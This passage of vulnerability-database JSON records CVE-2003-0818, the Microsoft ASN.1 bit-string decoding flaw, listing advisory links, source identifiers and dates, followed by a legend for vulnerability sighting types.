"trust": 0.1,
"url": "http://metasploit.com/framework/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2003-0818"
},
{
"trust": 0.1,
"url": "http://www.phreedom.org/solar/exploits/msasn1-bitstring/\u0027],"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/583108\u003e"
},
{
"trust": 0.1,
"url": "http://microsoft.com/technet/security/bulletin/ms04-007.asp\u003e"
},
{
"trust": 0.1,
"url": "http://support.microsoft.com/default.aspx?scid=252648\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/216324\u003e"
},
{
"trust": 0.1,
"url": "http://www.eeye.com/html/research/advisories/ad20040210.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta04-041a.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.eeye.com/html/research/advisories/ad20040210-2.html\u003e"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "PACKETSTORM",
"id": "83044"
},
{
"db": "PACKETSTORM",
"id": "32667"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#583108"
},
{
"db": "CERT/CC",
"id": "VU#216324"
},
{
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"db": "PACKETSTORM",
"id": "83044"
},
{
"db": "PACKETSTORM",
"id": "32667"
},
{
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-02-10T00:00:00",
"db": "CERT/CC",
"id": "VU#583108"
},
{
"date": "2004-02-10T00:00:00",
"db": "CERT/CC",
"id": "VU#216324"
},
{
"date": "2004-03-03T00:00:00",
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"date": "2005-04-21T00:00:00",
"db": "BID",
"id": "13300"
},
{
"date": "2004-02-10T00:00:00",
"db": "BID",
"id": "9633"
},
{
"date": "2004-02-10T00:00:00",
"db": "BID",
"id": "9635"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"date": "2009-11-26T00:34:53",
"db": "PACKETSTORM",
"id": "83044"
},
{
"date": "2004-02-11T02:24:00",
"db": "PACKETSTORM",
"id": "32667"
},
{
"date": "2003-11-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"date": "2004-03-03T05:00:00",
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-02-10T00:00:00",
"db": "CERT/CC",
"id": "VU#583108"
},
{
"date": "2004-02-11T00:00:00",
"db": "CERT/CC",
"id": "VU#216324"
},
{
"date": "2019-04-30T00:00:00",
"db": "VULMON",
"id": "CVE-2003-0818"
},
{
"date": "2009-07-12T14:06:00",
"db": "BID",
"id": "13300"
},
{
"date": "2009-07-12T02:06:00",
"db": "BID",
"id": "9633"
},
{
"date": "2009-07-12T02:06:00",
"db": "BID",
"id": "9635"
},
{
"date": "2007-04-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000037"
},
{
"date": "2019-05-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200403-040"
},
{
"date": "2019-04-30T14:27:13.710000",
"db": "NVD",
"id": "CVE-2003-0818"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft ASN.1 Library improperly decodes constructed bit strings",
"sources": [
{
"db": "CERT/CC",
"id": "VU#583108"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "13300"
},
{
"db": "BID",
"id": "9633"
},
{
"db": "BID",
"id": "9635"
}
],
"trust": 0.9
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.